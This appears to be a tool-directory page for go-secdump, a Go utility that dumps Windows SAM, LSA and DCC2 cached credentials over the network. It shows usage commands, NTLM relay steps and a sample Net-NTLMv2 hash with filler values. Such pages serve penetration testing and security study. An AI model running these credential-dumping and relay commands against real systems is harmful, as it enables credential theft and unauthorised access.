Go Secdump

Go Secdump logo

go-secdump


Description

Package go-secdump is a tool for dumping registry secrets.


Features

  • Dump SAM, LSA, and DCC2 cache secrets
  • Supports NTLM relaying
  • Supports SOCKS proxy relay

Usage


Basic usage

  • go-secdump --host <target_ip> --user <username> --pass <password>
    • Dump all registry secrets (SAM, LSA, and DCC2)

SAM, LSA, or DCC2 cache secret dumping

  • go-secdump --host <target_ip> --user <username> --pass <password> --sam
    • Dump only SAM secrets
  • go-secdump --host <target_ip> --user <username> --pass <password> --lsa
    • Dump only LSA secrets
  • go-secdump --host <target_ip> --user <username> --pass <password> --dcc2
    • Dump only DCC2 cache secrets

NTLM relaying

  • Start listener: go-secdump --host 192.168.0.100 -n --relay
    • Trigger an auth to your machine from a client with administrative access to 192.168.0.100
    • Wait for the dumped secrets
  • Net-NTLMv2 Hash: Administrator::domain.local:34f4533b697afc39:b4dcafebabedd12deadbeeffef1cea36:010100000deadbeef59d13adc22dda0

SOCKS proxy relay

  • go-secdump --host 192.168.0.100 --user Administrator -n --socks-host 127.0.0.1 --socks-port 1080
    • Use the upstream SOCKS5 proxy either for pivoting or to take advantage of Impacket's ntlmrelayx.py SOCKS server functionality




> Visit Go Secdump Website <
Best Search
Popular Tags